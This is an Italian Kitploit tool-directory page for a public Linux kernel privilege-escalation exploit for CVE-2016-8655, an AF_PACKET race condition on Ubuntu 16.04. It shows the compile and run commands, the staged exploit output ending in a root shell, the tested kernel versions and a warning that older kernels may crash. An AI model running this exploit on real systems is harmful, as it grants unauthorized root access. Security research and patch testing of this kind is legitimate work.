Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2016-8655 — Exploit di escalation dei privilegi locale del kernel Linux per CVE-2016-8655, che mira alla race condition AF_PACKET su Ubuntu 16.04 x86_64 per ottenere una shell di root tramite manipolazione della memoria. | Kitploit
Strumenti/GitHubGitHub/lakshmidesai/cve-2016-8655
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitBinary Exploitation
GitHublakshmidesai/cve-2016-8655

CVE-2016-8655

Exploit di escalation dei privilegi locale del kernel Linux per CVE-2016-8655, che mira alla race condition AF_PACKET su Ubuntu 16.04 x86_64 per ottenere una shell di root tramite manipolazione della memoria.

Vedi Repository
5439 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

ocobo_root.c exploit della race condition di AF_PACKET in Linux exploit per Ubuntu 16.04 x86_64

user@ubuntu:$ gcc chocobo_root.c -o chocobo_root -lpthread user@ubuntu:$ ./chocobo_root

making vsyscall page writable..

new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000 sockets allocated removing barrier and spraying.. version switcher stopping, x = -1 (y = 174222, last val = 2) current packet version = 0 pbd->hdr.bh1.offset_to_first_pkt = 48 === TPACKET_V1 && offset_to_first_pkt != 0, race won === please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that. closing socket and verifying....... vsyscall page altered!

stage 1 completed registering new sysctl..

new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850 sockets allocated removing barrier and spraying.. version switcher stopping, x = -1 (y = 30773, last val = 0) current packet version = 2 pbd->hdr.bh1.offset_to_first_pkt = 48 race not won

retrying stage.. new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850 sockets allocated removing barrier and spraying.. version switcher stopping, x = -1 (y = 133577, last val = 2) current packet version = 0 pbd->hdr.bh1.offset_to_first_pkt = 48 === TPACKET_V1 && offset_to_first_pkt != 0, race won === please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that. closing socket and verifying....... sysctl added!

stage 2 completed binary executed by kernel, launching rootshell root@ubuntu:~# id uid=0(root) gid=0(root) groups=0(root),1000(user)

==============================

Sono inclusi offset per kernel più vecchi, ma non sono testati, quindi tieni presente che questo exploit probabilmente farà crashare kernel precedenti alla 4.4.

testato su: Ubuntu 16.04: 4.4.0-51-generic Ubuntu 16.04: 4.4.0-47-generic Ubuntu 16.04: 4.4.0-36-generic Ubuntu 14.04: 4.4.0-47-generic #68~14.04.1-Ubuntu

Ringraziamenti a: jsc per l'ispirazione (https://www.youtube.com/watch?v=x4UDIfcYMKI) mcdelivery per aver consegnato hotcakes e caffè

11/2016 di rebel

Scarica lo strumento